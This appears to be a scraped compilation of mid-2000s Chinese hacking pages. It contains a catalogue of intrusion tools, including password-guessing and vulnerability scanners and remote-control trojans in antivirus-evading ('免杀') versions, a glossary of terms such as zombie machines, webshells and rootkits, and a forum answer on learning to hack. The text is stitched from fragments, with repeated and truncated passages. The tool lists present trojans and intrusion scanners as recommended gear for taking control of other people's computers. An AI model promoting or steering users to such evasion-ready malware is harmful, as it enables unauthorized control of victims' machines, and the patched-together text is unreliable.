Finder2 扫描端口速度非常快的一个工具,扫描完毕后还可以导出保存起来! SQLScan v1.2 猜解开着1433端口的住机密码工具! RPC漏洞扫描器 v1.03 针对RPC漏洞扫描的工具! 流光5.0 破解版国内大名鼎鼎的黑客扫描工具,由高级程序员小榕编写! 自动攻击探测机 Windows NT/2000 自动攻击探测机 4899空口令探测能够快速的扫描到被安装了radmin服务端4899端口的空口令IP! 二、远程控制 黑洞免杀版藏鲸阁-陈经韬编写的著名远程控制程序!该版本还是8月15最新版的哦! 冰河免杀版国内最有名,历史最悠久的木马冰河!本版本是冰河的最新版本,服务器端只有16KB! 灰鸽子迷你版灰鸽子工作室-葛军同志的作品! 网络神偷 5.7 网络神偷是一个专业级的远程文件访问工具!具有反弹功能! 广外女生 1.53 广州-广外女生小组的作品,曾风靡一时! 注意:该软件解压缩时会被查杀! Radmin3.2影子版非常有名的监视程序!并非木马,所以服务端不会被查杀! 黑...................... 2.0 使用跟Radmin一样,功能明显比它多,扫描速度也非常快!风雪远程控制 v3.9 基于TCP/IP协议的远程管理网络工具,一个具有反弹功能的工具,非常小巧! 无赖小子 2.5 无赖小子2.5,08月23日发布,其默认端口8011! 蓝色火焰 v0.5 蓝色火焰是一个没有客户端的木马,可谓无招胜有招!注意:该软件解压缩时会被查杀! 网络公牛国产公牛木马,由于上传文件大小限制,包中没有加入易语言运行库文件krnln.fnr! GoToMyPC 4.00 安装简单;能够从任何安装有浏览器的计算机上访问主机;具有新的安全功
黑客术语大全
黑客术语大全 1,肉鸡:所谓“肉鸡”是一种很形象的比喻,比喻那些可以随意被我们控制的电脑,对方可以是WINDOWS系统,也可以是UNIX/LINUX系统,可以是普通的个人电脑,也可以是大型的服务器,我们可以象操作自己的电脑那样来操作它们,而不被对方所发觉。 2,木马:就是那些表面上伪装成了正常的程序,但是当这些被程序运行时,就会获取系统的整个控制权限。有很多黑客就是热中与使用木马程序来控制别人的电脑,比如灰鸽子,黑洞,PcShare等等。 3,网页木马:表面上伪装成普通的网页文件或是将而已的代码直接插入到正常的网页文件中,当有人访问时,网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。 4,挂马:就是在别人的网站文件里面放入网页木马或者是将代码潜入到对方正常的网页文件里,以使浏览者中马。 5,后门:这是一种形象的比喻,**者在利用某些方法成功的控制了目标主机后,可以在对方的系统中植入特定的程序,或者是修改某些设置。这些改动表面上是很难被察觉的,但是**者却可以使用相应的程序或者方法来轻易的与这台电脑建立连接,重新控制这台电脑,就好象是**者偷偷的配了一把主人房间的要是,可以随时进出而不被主人发现一样。 通常大多数的特洛伊木马(Trojan Horse)程序都可以被**者用语制作后门(BackDoor)6,rootkit:rootkit是攻击者用来隐藏自己的行踪和保留root(根权限,可以理解成WINDOWS下的system或者管理员权限)访问权限的工具。通常,攻击者通过远程攻击的方式获得root访问权限,或者是先使用密码猜解(破解)的方式获得对系统的普通访问权限,进入系统后,再通过,对方系统内存在的安全漏洞获得系统的root权限。然后,攻击者就会在对方的系统中安装rootkit,以达到自己长久控制对方的目的,rootkit与我们前边提到的木马和后门很类似,但远比它们要隐蔽,黑客守卫者就是很典型的rootkit,还有国内的ntroorkit等都是不错的rootkit工具。 9,IPC$:是共享“命名管道”的资源,它是为了让进程间通信而开放的饿命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 10.弱口令:指那些强度不够,容易被猜解的,类似123,abc这样的口令(密码) 11.默认共享:默认共享是WINDOWS2000/XP/2003系统开启共享服务时自动开启所有硬 盘的共享,因为加了"$"符号,所以看不到共享的托手图表,也成为隐藏共享。 12.shell:指的是一种命令指行环境,比如我们按下键盘上的“开始键+R”时出现“运行”对 话框,在里面输入“cmd”会出现一个用于执行命令的黑窗口,这个就是WINDOWS的Shell 执行环境。通常我们使用远程溢出程序成功溢出远程电脑后得到的那个用于执行系统命令的环境就是对方的shell 13.WebShell:WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执 行环境,也可以将其称做是一种网页后门。黑客在**了一个网站后,通常会将这些asp 或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,好后就可以使用浏览器来访问这些asp 或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。可以上传下载文件,查看数据库,执行任意程序命令等。国内常用的WebShell 有海阳ASP木马,Phpspy,c99shell等 14.溢出:确切的讲,应该是“缓冲区溢出”。简单的解释就是程序对接受的输入数据没有
想掌握黑客类的知识应该学些什么呢
想掌握黑客类的知识应该学些什么呢 悬赏分:0 - 解决时间:2006-8-19 16:46 真的很羡慕那些强人,好厉害,也想学些黑客知识,我应该学些什么呢? 具体点的吧。网络安全这种的一定要的吧 提问者:kaka_kaka00 - 一级最佳答案 基础: 如何去学习 ·要有学习目标 ·要有学习计划 ·要有正确的心态 ·有很强的自学能力 学习目标 ·1.明确自己的发展方向(你现在或者将来要做什么,程序员?安全专家?网络黑客等) ·2.自己目前的水平和能力有多高 ·能简单操作windows2000 ·能简单配置windows2000的一些服务 ·能熟练的配置Windows2000的各种服务 ·能熟练配置win2000和各种网络设备联网 ·能简单操作Linux,Unix,Hp-unix, Solaris中的一种或者多种操作系统 ·能配置cicso,huawei,3com,朗迅等网络设备 ·会简单编写C/C++,Delphi,Java,PB,VB,Perl ·能简单编写Asp,Php,Cgi和script,shell脚本 ·3.必须学会不相信态度,尊重各种各样的能力 ·不要为那些装模做样的人浪费时间 ·尊重别人的能力, ·会享受提高自己能力的乐趣. ·在知道了自己的水平和能力之后就要开始自己的目标了 ·--------安全专家 ·--------黑客 ·--------高级程序员 ·黑客是建设网络,不是破坏网络, 破坏者是骇客; ·黑客有入侵的技术,但是他们是维护网络的,所以和安全专家是差不多的; ·因为懂得如何入侵才知道如何维护 ·因为懂得如何维护才更要了解如何入侵 ·这是黑客与安全专家的联系 ·但,他们都是在会编程的基础上成长的! ·下面我们开始我们的学习计划! 学习计划 有了学习计划才能更有效的学习 安全学习计划 不奢求对win98有多么精通,我们也不讲解win98如何应用,如何精通,我们的起步是win2000 s erver,这是我们培训的最低标准,你对英语有一定的了解也是必不可少
黑客常用工具集
黑客常用工具集 一、扫描工具 X-scan 3.1 焦点出的扫描器,国内最优秀的安全扫描软件之一!非常专业的一个扫描器! X-way 2.5 这也上一个非常不错的扫描器哦!功能非常多!使用也不难,进侵必备工具! SuperScan 3.0 强大的TCP 端口扫描器、Ping 和域名解析器! Namp 3.5 这个就厉害了,安全界人人皆知的非常有名气的一个扫描器!作者Fyodor Hscan v1.20 这是款运行在Win NT/2000下的漏洞扫描工具,有GUI以及命令行两种扫描方式! SSS 俄罗斯安全界非常专业的一个安全漏洞扫描软件! U-Scan.exe 非常好的UNICODE漏洞扫描工具! RpcScan V1.1 可以通过135端口枚举远程主机RPC连接信息! SHED 1.01 一个用来扫描共享漏洞的机器的工具! DSScan V1.00 ms04-011远程缓冲区溢出漏洞扫描专用! Dotpot PortReady1.6 该软件为“绿色软件”,无需安装,非常小巧(仅23KB),具有极快的扫描速度! WebDAVScan v1.0 针对WEBDAV漏洞的扫描工具! 留意:该软件解压缩时会被查杀! Socks Proxy Finder2 扫描端口速度非常快的一个工具,扫描完毕后还可以导出保存起来! SQLScan v1.2 猜解开着1433端口的住机密码工具! RPC漏洞扫描器 v1.03 针对RPC漏洞扫描的工具! 流光5.0 破解版国内大名鼎鼎的黑客扫描工具,由高级程序员小榕编写! 自动攻击探测机 Windows NT/2000 自动攻击探测机 4899空口令探测能够快速的扫描到被安装了radmin服务端4899端口的空口令IP! 旁注专用检测程序 1.2 旁注进侵专用检测程序,主要功能有查询虚拟主机域名和批量检测上传漏洞! 二、远程控制 黑洞2004 免杀版躲鲸阁-陈经韬编写的著名远程控制程序!该版本还是8月15最新版的哦! 冰河2004 免杀版国内最有名,历史最悠久的木马冰河!本版本是冰河的最新版本,服务器端只有16KB! 神气儿最新2.0版国产远程控制程序,DLL进程插进,IP反向连接!由第八军团出品! 灰鸽子迷你版灰鸽子工作室-葛军同道的作品! 网络神偷 5.7 网络神偷是一个专业级的远程文件访问工具!具有反弹功能! 广外女生 1.53 广州-广外女生小组的作品,曾风靡一时! 留意:该软件解压缩时会被查杀! Radmin3.2影子版非常有名的监视程序!并非木马,所以服务端不会被查杀! *** 2.0 使用跟Radmin一样,功能明显比它多,扫描速度也非常快! 风雪远程控制 v3.9 基于TCP/IP协议的远程治理网络工具,一个具有反弹功能的工具,非常小巧! 无赖小子 2.5 无赖小子2.5,08月23日发布,其默认端口8011! 蓝色火焰 v0.5 蓝色火焰是一个没有客户真个木马,可谓无招胜有招!留意:该软件解压缩时会被查杀! 网络公牛国产公牛木马,由于上传文件大小限制,包中没有加进易语言运行库文件krnln.fnr! GoToMyPC 4.00 安装简单;能够从任何安装有浏览器的计算机上访问主机;具有新的安全功能! 二、远程控制 黑洞2004 免杀版躲鲸阁-陈经韬编写的著名远程控制程序!该版本还是8月15最新版的哦! 冰河2004 免杀版国内最有名,历史最悠久的木马冰河!本版本是冰河的最新版本,服务器端只有16KB! 神气儿最新2.0版国产远程控制程序,DLL进程插进,IP反向连接!由第八军团出品! 灰鸽子迷你版灰鸽子工作室-葛军同道的作品! 网络神偷 5.7 网络神偷是一个专业级的远程文件访问工具!具有反弹功能! 广外女生 1.53 广州-广外女生小组的作品,曾风靡一时! 留意:该软件解压缩时会被查杀!
【一】网络安全名词解释
肉鸡 什么是电脑“ 肉鸡” 所谓电脑肉鸡,就是拥有管理权限的远程电脑。也就是受别人控制的远程电脑。肉鸡可以是各种系统,如win,linux,unix 等;更可以是一家公司\企业\学校甚至是政府军队的服务器,一般所说的肉鸡是一台开了3389端口的Win2K系统的服务器,所以3389端口没必要开时关上最好。 要登陆肉鸡,必须知道3个参数:远程电脑的IP、用户名、密码。 说到肉鸡,就要讲到远程控制。远程控制软件例如灰鸽子、上兴等。还有有些远程控制软件需要在肉鸡上挂马。 肉鸡不是吃的那种,是中了木马,或者留了后门,可以被远程操控的机器,现在许多人把有WEBSHELL 权限的机器也叫肉鸡。
谁都不希望自己的电脑被他人控制,但是很多人的电脑是几乎不设防的,很容易被远程攻击者完全控制。你的电脑就因此成为别人砧板上的肉,别人想怎么吃就怎么吃,肉鸡(机)一名由此而来。 Webshell 1、webshell是什么? 顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。 webshell常常被称为匿名用户(入侵者)通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。 2、webshell有什么作用? 一方面,webshell被站长常常用于网站管理、服务器管理等等。
根据FSO权限的不同,作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。 另一方面,被入侵者利用,从而达到控制网站服务器的目的。这些网页脚本常称为web。 脚本木马,目前比较流行的asp或php 木马,也有基于.NET的脚本木马。 3、webshell的隐蔽性 有些恶意网页脚本可以嵌套在正常网页中运行,且不容易被查杀。 webshell可以穿越服务器防火墙,由于与被控制的服务器或远程主机交换的数据都是通过80端口传递的,因此不会被防火墙拦截。 并且使用webshell一般不会在系统日志中留下记录,只会在网站的web日志中留下一些数据提交记录,没有经验的管理员是很难看出入侵痕迹的。